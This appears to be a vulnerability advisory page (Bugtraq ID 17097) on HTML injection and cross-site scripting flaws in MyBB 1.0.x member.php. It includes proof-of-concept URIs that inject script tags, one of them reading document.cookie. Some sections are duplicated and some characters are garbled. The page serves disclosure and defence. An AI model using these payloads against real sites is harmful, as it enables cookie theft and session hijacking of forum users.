MyBB Multiple Input Validation Vulnerabilities
BID:17097
Info
MyBB Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 17097 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 14 2006 12:00AM |
| Updated: | Mar 16 2006 06:10AM |
| Credit: | imei is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
MyBulletinBoard MyBulletinBoard 1.0.4 MyBulletinBoard MyBulletinBoard 1.0.3 MyBulletinBoard MyBulletinBoard 1.0.2 MyBulletinBoard MyBulletinBoard 1.0.1 MyBulletinBoard MyBulletinBoard 1.0 PR2 MyBulletinBoard MyBulletinBoard 1.0 MyBulletinBoard MyBulletinBoard RC4 MyBulletinBoard MyBulletinBoard RC3 MyBulletinBoard MyBulletinBoard RC2 MyBulletinBoard MyBulletinBoard RC1 |
| Not Vulnerable: | |
Discussion
MyBB Multiple Input Validation Vulnerabilities
MyBB is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, or to misrepresent how HTML content is cached, served, or interpreted; other attacks are also possible.
MyBB is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, or to misrepresent how HTML content is cached, served, or interpreted; other attacks are also possible.
Exploit / POC
MyBB Multiple Input Validation Vulnerabilities
This issue can be exploited via a web client.
The following proof-of-concept URIs are available:
HTML injection:
http://www.example.com/mybb/member.php?username=blab&password=blabblab &password2=blabblab &[email protected]&&[email protected]&imagestring=[fill here if needed]&imagehash=[fill here if needed]&action=do_register&yahoo=%3C script%3E alert(document.cookie)%3C/script %3E®submit=register me mybb:D
Cross-site scripting:
http://www.example.com/mybb/member.php?action=do_login&username=imei&password=doyouneedmine&url=â?><script>alert(1)</script><!â??
This issue can be exploited via a web client.
The following proof-of-concept URIs are available:
HTML injection:
http://www.example.com/mybb/member.php?username=blab&password=blabblab &password2=blabblab &[email protected]&&[email protected]&imagestring=[fill here if needed]&imagehash=[fill here if needed]&action=do_register&yahoo=%3C script%3E alert(document.cookie)%3C/script %3E®submit=register me mybb:D
Cross-site scripting:
http://www.example.com/mybb/member.php?action=do_login&username=imei&password=doyouneedmine&url=â?><script>alert(1)</script><!â??
Solution / Fix
MyBB Multiple Input Validation Vulnerabilities
Solution:
The vendor has released an update to address these issues. Contact the vendor for further information.
Solution:
The vendor has released an update to address these issues. Contact the vendor for further information.
References
MyBB Multiple Input Validation Vulnerabilities
References:
References:
- MyBB 1.0.3~member.php~XSS Attack in contact details (Imei)
- MyBB1.0.4~member.php~XSS after login (Imei)
- MyBB1.0.4~redirectfunction()~HeaderInjection (Imei)
- MyBulletinBoard Home Page (MyBulletinBoard)